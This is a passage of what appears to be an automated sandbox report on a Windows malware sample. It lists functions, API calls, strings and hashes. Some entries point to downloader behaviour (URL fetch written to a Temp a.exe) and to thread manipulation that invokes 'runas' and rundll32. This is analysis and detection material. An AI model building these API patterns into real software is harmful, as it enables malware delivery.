Opcode Fuzzy Hash: 22764e221508dd3113fd5afd4bc4bde1a69ed1c99b13e83f2cf5ec22db7cdf79
Instruction Fuzzy Hash: 23811671600108ABEB18DF28CD85BAE7B76EF86304F10817DF811E72D5D7399A918B59

Uniqueness

Uniqueness Score: -1.00%

Function 00412E23, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 141pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00412D55), ref: 00412E45
GetFileInformationByHandle.KERNEL32(?,?), ref: 00412E9F
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00412D55,?,000000FF,00000000,00000000), ref: 00412F2D
__dosmaperr.LIBCMT ref: 00412F34
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00412F71

Part of subcall function 00413199: __dosmaperr.LIBCMT ref: 004131CE

Strings

U-A, xrefs: 00412E3D

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID: U-A
API String ID: 1206951868-3032948384
Opcode ID: 8b1a0423a5533b8669acd58f23fe5f594cfb955b83b82e07858e38faf1e2f25f
Instruction ID: eeae2faa3aed4e31c5b3581962899d3ac73206647a9ddec97f6dddcac266fbf2
Opcode Fuzzy Hash: 8b1a0423a5533b8669acd58f23fe5f594cfb955b83b82e07858e38faf1e2f25f
Instruction Fuzzy Hash: AA415A71A00204AFDB249FA6D9459EFBBF9EF88300B10452EF856D3610E7789996DB24

Uniqueness

Uniqueness Score: -1.00%

Function 004066E0, Relevance: 10.6, APIs: 7, Instructions: 105networkfileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,7076FB10), ref: 00406715
InternetOpenA.WININET(0042DD05,00000000,00000000,00000000,00000000), ref: 0040672A
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040674A
InternetReadFile.WININET(00000000,?,00010000,00010000), ref: 00406761
CloseHandle.KERNEL32(00000000), ref: 004067A3
InternetCloseHandle.WININET(?), ref: 004067B2
InternetCloseHandle.WININET(00000000), ref: 004067B5

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Internet$CloseHandle$FileOpen$CreateRead
String ID:
API String ID: 4113138902-0
Opcode ID: 8e8474b3d7385f4ec1393f5ac6450ed5fcbc8588ab00df1b40b1c67a81f96227
Instruction ID: 82d239edc4f9a44a6b38d32b20256dccf2bfbe76675007c87c090b50ed6ff4fb
Opcode Fuzzy Hash: 8e8474b3d7385f4ec1393f5ac6450ed5fcbc8588ab00df1b40b1c67a81f96227
Instruction Fuzzy Hash: 3731D831741208FBEB20DF64DC85FDE3769EB48704F604129FA05A72C1C7B8E9958B68

Uniqueness

Uniqueness Score: -1.00%

Function 004130EB, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 0041312D

Strings

.cmd, xrefs: 0041314B
.com, xrefs: 0041316D
.bat, xrefs: 0041315C
`-A, xrefs: 004130FA, 00413101, 0041312C
.exe, xrefs: 0041313A

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe$`-A
API String ID: 1752292252-3771303089
Opcode ID: 660063442547fc9bdf2a5e1868c7f1981bcae5f7a368da2cdbeca21f95a9fc77
Instruction ID: 01a0b04ec85573aeaa4127191f4fe01adb7c54a3db56af9483a67475f3b1a0e9
Opcode Fuzzy Hash: 660063442547fc9bdf2a5e1868c7f1981bcae5f7a368da2cdbeca21f95a9fc77
Instruction Fuzzy Hash: 01010437B08225352A14153AAD027EB17A98BC1BB5736002FF844E72C1EE4CED8301AC

Uniqueness

Uniqueness Score: -1.00%

Function 0041CD89, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 0041CD51: _free.LIBCMT ref: 0041CD76

_free.LIBCMT ref: 0041CDD7

Part of subcall function 00416AE1: HeapFree.KERNEL32(00000000,00000000,?,00415BDE), ref: 00416AF7
Part of subcall function 00416AE1: GetLastError.KERNEL32(?,?,00415BDE), ref: 00416B09

_free.LIBCMT ref: 0041CDE2
_free.LIBCMT ref: 0041CDED
_free.LIBCMT ref: 0041CE41
_free.LIBCMT ref: 0041CE4C
_free.LIBCMT ref: 0041CE57
_free.LIBCMT ref: 0041CE62

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 17f53bcb001aa0cf27f4b28cdacd85efe4fe4569033449001c41b86b803b0e8a
Instruction ID: 24e028db3b5b37ce1182df8ca68fb3e28601401460540692c5db838992c7a21d
Opcode Fuzzy Hash: 17f53bcb001aa0cf27f4b28cdacd85efe4fe4569033449001c41b86b803b0e8a
Instruction Fuzzy Hash: A41142716C0714ABDD20B7F2DC87FCB7FAC9F01704F40482EB29966062DA69F9844694

Uniqueness

Uniqueness Score: -1.00%

Function 00411324, Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0041131B,00411189,00410A97), ref: 00411332
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00411340
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00411359
SetLastError.KERNEL32(00000000,0041131B,00411189,00410A97), ref: 004113AB

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: cc9d831f5620b19fe40e364637f58eb4bbfa09f798e940f6494a521d864bfe68
Instruction ID: 961b833f87ea4a83dcfe70b28b4815d45fa85e098a5eeee1792b212015449ee5
Opcode Fuzzy Hash: cc9d831f5620b19fe40e364637f58eb4bbfa09f798e940f6494a521d864bfe68
Instruction Fuzzy Hash: E301B5326193195EF6282776BD856EB2664FB057B9720023FFA3481EF9EE194CC2914C

Uniqueness

Uniqueness Score: -1.00%

Function 00402850, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127threadsleepinjectionCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F400: Concurrency::cancel_current_task.LIBCPMT ref: 0040F521

CreateThread.KERNEL32 ref: 004028B6
Sleep.KERNEL32(00001388,?,?,?,?,?,?,?,?,?,?), ref: 004028C3
SuspendThread.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 004028CA

Strings

runas, xrefs: 00402A0F
rundll32.exe, xrefs: 00402C3C

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Thread$Concurrency::cancel_current_taskCreateSleepSuspend
String ID: runas$rundll32.exe
API String ID: 1039963361-4081450877
Opcode ID: 16325c2e32e9ab3132d1501774c29ab6d0cf145bfe99106a6ccbbe243ac3e597
Instruction ID: 42b7ca274eb817c12e76147a0cd4eb71e1a695c863fa04b6ecea546d4405010a
Opcode Fuzzy Hash: 16325c2e32e9ab3132d1501774c29ab6d0cf145bfe99106a6ccbbe243ac3e597
Instruction Fuzzy Hash: F4410371300208ABEB18DF28CE89BDD3B66AF45354F50812AFD55972D1C7BDD8C08B98

Uniqueness

Uniqueness Score: -1.00%

Function 0041B97A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\a.exe, xrefs: 0041B97F

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\a.exe
API String ID: 0-517955835
Opcode ID: a135bc52e632afb7e30117bce7d08b298d6bf813592c1d54b833699d7002b245
Instruction ID: f393f893518ab01fde55ca9dbfccdf3a831398418380878a84eb78fd5b620eeb
Opcode Fuzzy Hash: a135bc52e632afb7e30117bce7d08b298d6bf813592c1d54b833699d7002b245
Instruction Fuzzy Hash: D421D471604205BF9B20AF628C80DEB77ACEF503A8710452BF965C7250E739ECC187E9

Uniqueness

Uniqueness Score: -1.00%

Function 00411634, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMON

Download Yara Rule

Strings

api-ms-, xrefs: 00411684

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID: api-ms-
API String ID: 0-2084034818
Opcode ID: 13fa8edd74a5ebf676ef5eab8425b72db595579b6b6389a92dd1a8554c16ec56
Instruction ID: 0dfb5ada7f88034afeb85654b33143b1619c060009811f75cd45c04b65c3cffb
Opcode Fuzzy Hash: 13fa8edd74a5ebf676ef5eab8425b72db595579b6b6389a92dd1a8554c16ec56
Instruction Fuzzy Hash: F311CB31B06225ABDB314B24DC44B9F77989F017A4B190527EF05A73B0DB75DD4186EC

Uniqueness

Uniqueness Score: -1.00%

Function 004126E3, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,004126D8,?,?,004126A0,?,?,?), ref: 004126F8
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0041270B
FreeLibrary.KERNEL32(00000000,?,?,004126D8,?,?,004126A0,?,?,?), ref: 0041272E

Strings

CorExitProcess, xrefs: 00412703
mscoree.dll, xrefs: 004126F1

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 46bea130221916812116109ab7049804666fe0117f292e9567cc9e4b522641bb
Instruction ID: 8992daf76f7e9c560d9d8d006ac189f8aefa068ab0fd4bca41b28a43322cc10f
Opcode Fuzzy Hash: 46bea130221916812116109ab7049804666fe0117f292e9567cc9e4b522641bb
Instruction Fuzzy Hash: F9F08230602218FBEB259B50EE09BDF7B75EB04795F510069E505F11A0CF788E55DA9C

Uniqueness

Uniqueness Score: -1.00%

Function 00403E80, Relevance: 7.7, APIs: 5, Instructions: 212COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C), ref: 00403ED6

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 88cf7438076f06ccd8e19d14a87d9a9fb0a320b62b016255772fcc24d55e5d3f
Instruction ID: 9c83b3814b079a037081a6ec046e9a543e7a695bf6cfb2c530177edccd805474
Opcode Fuzzy Hash: 88cf7438076f06ccd8e19d14a87d9a9fb0a320b62b016255772fcc24d55e5d3f
Instruction Fuzzy Hash: 9C61F7B1D092089BEB20DF68DC4579EBBB4EB45315F5002BBE900B7690E779499487C9

Uniqueness

Uniqueness Score: -1.00%

Function 0040676B, Relevance: 7.6, APIs: 5, Instructions: 140networkfileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406787
InternetReadFile.WININET(?,?,?,?), ref: 00406798
CloseHandle.KERNEL32(00000000), ref: 004067A3
InternetCloseHandle.WININET(?), ref: 004067B2
InternetCloseHandle.WININET(00000000), ref: 004067B5

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CloseHandleInternet$File$ReadWrite
String ID:
API String ID: 567989605-0
Opcode ID: 09fa4b26bc98ce00335cae5f38d1453e7dbe9983fedffbdf20437b1c6aecaeef
Instruction ID: 8095328d12c55a69b132ba6a5d7c7ce1925bf263163443f8ed3d6cb1f3e444d8
Opcode Fuzzy Hash: 09fa4b26bc98ce00335cae5f38d1453e7dbe9983fedffbdf20437b1c6aecaeef
Instruction Fuzzy Hash: 80410472A011089BEF04EF64CD85AEE7769EB44314F54823EF816E3281D739DA94CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041CCE8, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041CD00

Part of subcall function 00416AE1: HeapFree.KERNEL32(00000000,00000000,?,00415BDE), ref: 00416AF7
Part of subcall function 00416AE1: GetLastError.KERNEL32(?,?,00415BDE), ref: 00416B09

_free.LIBCMT ref: 0041CD12
_free.LIBCMT ref: 0041CD24
_free.LIBCMT ref: 0041CD36
_free.LIBCMT ref: 0041CD48

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f937f6d1b54b543fc24e0c382ca6138a2ca5fa36c124f1f114eabe275f8b2ac5
Instruction ID: e45377414f5d8e73353c54d7e7feb88650139d0f62cf2f7ea79ef1335cb1164d
Opcode Fuzzy Hash: f937f6d1b54b543fc24e0c382ca6138a2ca5fa36c124f1f114eabe275f8b2ac5
Instruction Fuzzy Hash: 59F0FF32684210A78A24FB59FDC6CD77BD9EE05791765582AF009E7611CB28FCC18AAC

Uniqueness

Uniqueness Score: -1.00%

Function 0041B3B5, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041B54F

Strings

*?, xrefs: 0041B3F8

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 209c829de90e4970515e92ab84f255be5b3120160fb59cf257b514b87dbd60d9
Instruction ID: 7522f7feb1860f8c275aedd2fe801aa7d0a5f68e575f13a1fa028780014abb63
Opcode Fuzzy Hash: 209c829de90e4970515e92ab84f255be5b3120160fb59cf257b514b87dbd60d9
Instruction Fuzzy Hash: 26613B75E00219AFCF14CFA9C8815EEFBF5EF48314B25816AE815E7301D739AE818B94

Uniqueness

Uniqueness Score: -1.00%

Function 0041F27A, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,?,@=@,0042F058,0042F058,?,0041F327,?,?,00000002,00000000), ref: 0041F2B3
GetLastError.KERNEL32(?,@=@,0042F058,0042F058,?,0041F327,?,?,00000002,00000000,?,0041922D,@=@,00000000,00000000,00000002), ref: 0041F2BD
__dosmaperr.LIBCMT ref: 0041F2C4

Strings

@=@, xrefs: 0041F281

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID: @=@
API String ID: 2336955059-2481937916
Opcode ID: f1fd7c68a81e8402f2c6e1936e4be3aa76e45a537420bc836a4601040a065e3c
Instruction ID: 63f98fb2019b063b111a29895b890bbc4f6049c1ed554a01321e780446b17d38
Opcode Fuzzy Hash: f1fd7c68a81e8402f2c6e1936e4be3aa76e45a537420bc836a4601040a065e3c
Instruction Fuzzy Hash: D3016836700515BBCB109FA5DC01CDE3B29EB81320724025AF811D72C0EA75DD838768

Uniqueness

Uniqueness Score: -1.00%

Function 00417B27, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(2,A,?,00412C32,?,?,?,74B06490), ref: 00417B2F
GetLastError.KERNEL32(?,00412C32,?,?,?,74B06490), ref: 00417B39
__dosmaperr.LIBCMT ref: 00417B40

Strings

2,A, xrefs: 00417B2C

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: DeleteErrorFileLast__dosmaperr
String ID: 2,A
API String ID: 1545401867-3762614852
Opcode ID: 6f32dd3ac6607e0831637362e45be0c508fe760c8c9bf0a6073d66f254749a20
Instruction ID: 17fd4dc670cc0bcec2738c61e597ebaa69260a7c89f0ee860e3bb43737d21fa5
Opcode Fuzzy Hash: 6f32dd3ac6607e0831637362e45be0c508fe760c8c9bf0a6073d66f254749a20
Instruction Fuzzy Hash: CAD01232249108B79B202FF6FC0985B7B6C9B813B9351466AF62DC52E0DF35D8A2855C

Uniqueness

Uniqueness Score: -1.00%

Function 00419CEC, Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00419D73

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 469ccfc940f1786b31dd1366cd5962f173c3bac590e2e409a0e9dca385e2547e
Instruction ID: bbfdc9da8def3dab84f97f93735f959a1bb6ffc0cdac0f1d14d8a033fad8b2b1
Opcode Fuzzy Hash: 469ccfc940f1786b31dd1366cd5962f173c3bac590e2e409a0e9dca385e2547e
Instruction Fuzzy Hash: 9EB14532A04245AFDB11CF28C8A17EEBBE5EF45340F1441ABE445DB381D63C9D82CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00421B4E, Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00421C1E
_free.LIBCMT ref: 00421C47
SetEndOfFile.KERNEL32(00000000,0041E027,00000000,?,?,?,?,?,?,?,?,0041E027,?,00000000), ref: 00421C79
GetLastError.KERNEL32(?,?,?,?,?,?,?,0041E027,?,00000000,?,?,?,?,?), ref: 00421C95

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: ac5b299c8ce1d24b7ff73f77ddc8242753a20edc9aa17454026a50c1e187d435
Instruction ID: 7f6a5843839951e58e46209c3173018afacb9c0704a888b8d38cfd3cde0ba63c
Opcode Fuzzy Hash: ac5b299c8ce1d24b7ff73f77ddc8242753a20edc9aa17454026a50c1e187d435
Instruction Fuzzy Hash: E1411836B40514ABDB11AFABDC42BDE3B75AF64324F54041BF814E72A1EA3DDC808729

Uniqueness

Uniqueness Score: -1.00%

Function 0041B2E6, Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 00412B67: _free.LIBCMT ref: 00412B75

Part of subcall function 0041C2BD: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,004216C0,?,00000000,00000000), ref: 0041C35F

GetLastError.KERNEL32 ref: 0041B34E
__dosmaperr.LIBCMT ref: 0041B355
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B394
__dosmaperr.LIBCMT ref: 0041B39B

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: da9ee22aef71d00c9a6596a6c64b97374f3d41420e9bf5bebbf89200c1b54b4c
Instruction ID: 98c6e21b53565e4313d6124fea9c8e8dcaf5e73ec16f64982a036c50cc41a7a4
Opcode Fuzzy Hash: da9ee22aef71d00c9a6596a6c64b97374f3d41420e9bf5bebbf89200c1b54b4c
Instruction Fuzzy Hash: 04219571600609BF9B20AF628C809ABB7ACEF04368710451AFC25D7350D739EDA187ED

Uniqueness

Uniqueness Score: -1.00%

Function 004173D4, Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00412AE5,?,?,?,?,00413752,?), ref: 004173D9
_free.LIBCMT ref: 00417436
_free.LIBCMT ref: 0041746C
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00412AE5,?,?,?,?,00413752,?), ref: 00417477

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: b8b5eb83db0efb224591ceb28b020ff365d517ffcfdeacddf844eedfbbb22344
Instruction ID: a8e7c145d71b843d6459240c20bbbbb4dcdeb47ea9b39a8c28f6429b80be8ac1
Opcode Fuzzy Hash: b8b5eb83db0efb224591ceb28b020ff365d517ffcfdeacddf844eedfbbb22344
Instruction Fuzzy Hash: 60110A7124C1126B9B1127755CC2DEB29798BC13B8725413BF924922E1ED2CCCCA512D

Uniqueness

Uniqueness Score: -1.00%

Function 0041752B, Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,004136EC,00416B07,?,?,00415BDE), ref: 00417530
_free.LIBCMT ref: 0041758D
_free.LIBCMT ref: 004175C3
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,004136EC,00416B07,?,?,00415BDE), ref: 004175CE

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: efa28a8c090eaa0684d7b67768ace81a26ed2eb21bc83343e1d5a3628ab4fab0
Instruction ID: ca9ab72c055ee22aebe7ea3655d433d96ac34adbfbdb33d86d5f844769caa9b1
Opcode Fuzzy Hash: efa28a8c090eaa0684d7b67768ace81a26ed2eb21bc83343e1d5a3628ab4fab0
Instruction Fuzzy Hash: 92110A7124C1017BDB11267A5CC2EEB267B8BC1378721423BF124926E1EE3CCCDA512C

Uniqueness

Uniqueness Score: -1.00%

Function 00417C1E, Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,00000000,00417D83,00000000,?,0041E6E7,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 00417C34
GetLastError.KERNEL32(?,0041E6E7,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,00417D83,00000000,00000104,?), ref: 00417C3E
__dosmaperr.LIBCMT ref: 00417C45

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 0f8b4bd8487d328e7a226aea4937cc6a246b26ffbd0253273dd6d69dc00c4303
Instruction ID: 9545641e65fd02234ad19d1a328de46bad9dda71ac78d85e0884c628119e02ad
Opcode Fuzzy Hash: 0f8b4bd8487d328e7a226aea4937cc6a246b26ffbd0253273dd6d69dc00c4303
Instruction Fuzzy Hash: 42F04F32704115BB8B301BA2D80889AFFB9EF843A03508126F419C6210DB39E8A2DBD8

Uniqueness

Uniqueness Score: -1.00%

Function 00417C87, Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,00000000,00417D83,00000000,?,0041E672,00000000,00000000,00417D83,?,?,00000000,00000000,00000001), ref: 00417C9D
GetLastError.KERNEL32(?,0041E672,00000000,00000000,00417D83,?,?,00000000,00000000,00000001,00000000,00000000,?,00417D83,00000000,00000104), ref: 00417CA7
__dosmaperr.LIBCMT ref: 00417CAE

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: fb16e1c5050e98ca8c0c398606c0e4ddaba3e54747852d603290ca644c7f0859
Instruction ID: a90aae8e025fc8f2ca9f836f629dd40ed4aa21740edb4743904a5ae9e2d64cbb
Opcode Fuzzy Hash: fb16e1c5050e98ca8c0c398606c0e4ddaba3e54747852d603290ca644c7f0859
Instruction Fuzzy Hash: 0EF06232304115BB8B201F66DC04C9BBF79FF443A53008126F419C6510EB35D8A2D7D8

Uniqueness

Uniqueness Score: -1.00%

Function 00422075, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,0042F058,00000000,?,?,0041F4B1,?,00000001,?,@=@,?,00418D0E,00000000,?,@=@), ref: 0042208C
GetLastError.KERNEL32(?,0041F4B1,?,00000001,?,@=@,?,00418D0E,00000000,?,@=@,00000000,@=@,?,00419262,?), ref: 00422098

Part of subcall function 0042205E: CloseHandle.KERNEL32(FFFFFFFE,004220A8,?,0041F4B1,?,00000001,?,@=@,?,00418D0E,00000000,?,@=@,00000000,@=@), ref: 0042206E

___initconout.LIBCMT ref: 004220A8

Part of subcall function 00422020: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0042204F,0041F49E,@=@,?,00418D0E,00000000,?,@=@,00000000), ref: 00422033

WriteConsoleW.KERNEL32(?,?,0042F058,00000000,?,0041F4B1,?,00000001,?,@=@,?,00418D0E,00000000,?,@=@,00000000), ref: 004220BD

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 1d8aaa3be108c48cedfbb4dc71edcfd09de804c0dbef89207983d28d6aba2738
Instruction ID: a94c821782d9fd639b96644f91a3ae20f36901606f9210b589fc00418fce2359
Opcode Fuzzy Hash: 1d8aaa3be108c48cedfbb4dc71edcfd09de804c0dbef89207983d28d6aba2738
Instruction Fuzzy Hash: 4EF03736201128BBCF222F91EC04A8E3F26FF087E0B854125FB1895130DA728860DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00415D1C, Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00415D25

Part of subcall function 00416AE1: HeapFree.KERNEL32(00000000,00000000,?,00415BDE), ref: 00416AF7
Part of subcall function 00416AE1: GetLastError.KERNEL32(?,?,00415BDE), ref: 00416B09

_free.LIBCMT ref: 00415D38
_free.LIBCMT ref: 00415D49
_free.LIBCMT ref: 00415D5A

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: abed878174c8b1123a9d76fd96b073269f6b291acab0ab9064581f63acc10935
Instruction ID: 07c4cde2547e1e3814cdd7fc282fc2d6065301cffb343253470ca44c5ef027a6
Opcode Fuzzy Hash: abed878174c8b1123a9d76fd96b073269f6b291acab0ab9064581f63acc10935
Instruction Fuzzy Hash: EEE0E675550131AB8F05BF16BE414DA3E61FF49755302F12BF41422231CFB699919F8D

Uniqueness

Uniqueness Score: -1.00%

Function 0041C05B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166COMMON

Download Yara Rule

APIs

Part of subcall function 0041BBF0: GetOEMCP.KERNEL32(00000000,0041BE62,?,?,R7A,00413752,?), ref: 0041BC1B

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,R7A,0041BEA9,?,00000000,?,?,?,?,?,?,00413752), ref: 0041C0B9
GetCPInfo.KERNEL32(00000000,0041BEA9,?,R7A,0041BEA9,?,00000000,?,?,?,?,?,?,00413752,?), ref: 0041C0FB

Strings

R7A, xrefs: 0041C05D

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CodeInfoPageValid
String ID: R7A
API String ID: 546120528-27652862
Opcode ID: 1309bec368fe9cdcfb6b76a6bf7f6f77493b6fc11f7fb933c49f665a9cfb1c24
Instruction ID: 3a1fb7c2027f1d74f7731a2a47de3ff0baf1c3c3db0cabd02c8c0bd95f10fe8d
Opcode Fuzzy Hash: 1309bec368fe9cdcfb6b76a6bf7f6f77493b6fc11f7fb933c49f665a9cfb1c24
Instruction Fuzzy Hash: B4512170A80240AFDB218F76CC816EBBBF5EF55304F14846FD08687252E77C99868F99

Uniqueness

Uniqueness Score: -1.00%

Function 0041538B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\a.exe, xrefs: 004153CE, 004153D5, 0041540B

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\a.exe
API String ID: 0-517955835
Opcode ID: e56190b608ac81809b8862db195d3d43570d58295422ae2dc0dc93c658ad1f52
Instruction ID: 8b9dfca9cfb38f7da799fba3d0b667af7dcb61d8d3e66f97b3e079fc5387935a
Opcode Fuzzy Hash: e56190b608ac81809b8862db195d3d43570d58295422ae2dc0dc93c658ad1f52
Instruction Fuzzy Hash: 77417471A00618EFDB25EB999D81AEFBBF8EBC5310F14006BE40497211D7B89AC18758

Uniqueness

Uniqueness Score: -1.00%

Function 00418F80, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104fileCOMMON

